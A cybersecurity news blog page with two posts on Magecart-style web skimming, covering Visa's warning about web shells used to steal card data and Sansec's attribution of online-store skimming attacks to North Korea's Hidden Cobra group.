Search This Blog

Showing posts with label Magecart. Show all posts

Visa: Hackers Use Web Shells to Compromise Servers and Steal Credit Card Details

Visa, a global payment processor has warned that hackers are on the rise in deploying web shells in infected servers to steal credit card information from online customers. A kind of tools  (scripts or programs) Web Shells are used by hackers to infiltrate into compromised, deploy remote execute arbitrary commands or codes, traverse secretly within victim's compromised network, or attach extra payloads (malicious). Since last year, VISA has witnessed an increase in the use of web shells to deploy java-script-based files termed as credit card skimming into breached online platforms in digital skimming (also known as web skimming, e-skimming, or Magecart attacks).  

If successful, the skimmers allow the hackers to extradite payment information, and personal data posted by breached online platform customers and then transfer it to their controlled severs. According to VISA, "throughout 2020, Visa Payment Fraud Disruption (PFD) identified a trend whereby many e-skimming attacks used web shells to establish a command and control (C2)during the attacks. PFD confirmed at least 45 eskimming attacks in 2020 using web shells, and security researchers similarly noted increasing web shell use across the wider information security threat landscape."

As per VISA PFD findings, most Magecart hackers used web shells to plant backdoors in compromised online store servers and build a c2c (command and control) infrastructure which lets the hackers steal the credit card information. The hackers used various approaches to hack the online shops' servers, exploiting vulnerabilities in unsafe infrastructure (administrative), apps/website plugins related to e-commerce, and unpatched/out-of-date e-commerce websites. These Visa findings were confirmed earlier this February when Microsoft Defender Advanced Threat Protection (APT) team revealed that these web shells implanted on compromised servers have grown as much as twice since last year.  

"The company's security researchers discovered an average of 140,000 such malicious tools on hacked servers every month, between August 2020 to January 2021," reports Bleeping Computer.  "In comparison, Microsoft said in a 2020 report that it detected an average of 77,000 web shells each month, based on data collected from roughly 46,000 distinct devices between July and December 2019," it further says.

Hackers Attack Online Stores Stealing Credit Card Data, Experts Allege North Korea


According to the recent findings, there has been an incident of web skimming attacks on the European and American online store websites. The hackers responsible for the attacks are likely to be state-sponsored from North Korea. Research conducted by cybersecurity experts at Sansec reveals that the web skimming attacks that broke into the online retail stores started in May 2019. APT Lazarus and Hidden Cobra hacking groups were responsible for the attacks, planting payment skimmers to breach the security.



According to the new research, the hackers have now increased their activities. They have now set a larger target area and attack online stores using a skimming script, which steals the customer's banking credentials during the checkout stage. The researchers from Sansec claim that the attacks were carried out by Hidden Cobra because a similar hacking pattern was used in their previous attacks.

What is Magecart Attack? 
It is a web skimming attack in which hackers can steal banking credentials from the user and credit card details. However, in this incident, Hidden Cobra, after gaining access, launched a large scale attack on big online retail stores. Once hackers have unauthorized access, they deploy fake scripts on the websites' checkout pages. The skimmer then stores all the credentials that the user types during the checkout stage and sends it to the main Hidden Cobra servers. According to Sances data, in millions of online stores, up to 100 stores' websites are compromised on an average every day.

"To monetize the skimming operations, HIDDEN COBRA developed a global exfiltration network. This network utilizes legitimate sites that were hijacked and repurposed to serve as disguises for criminal activity. The system is also used to funnel the stolen assets so that they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, including a modeling agency8 from Milan, a vintage music store9 from Tehran, and a family-run book store10 from New Jersey," says the Sansec report. Experts have now linked various attacks since 2019 to Hidden Cobra, say that the threat actors are very likely to be state-sponsored.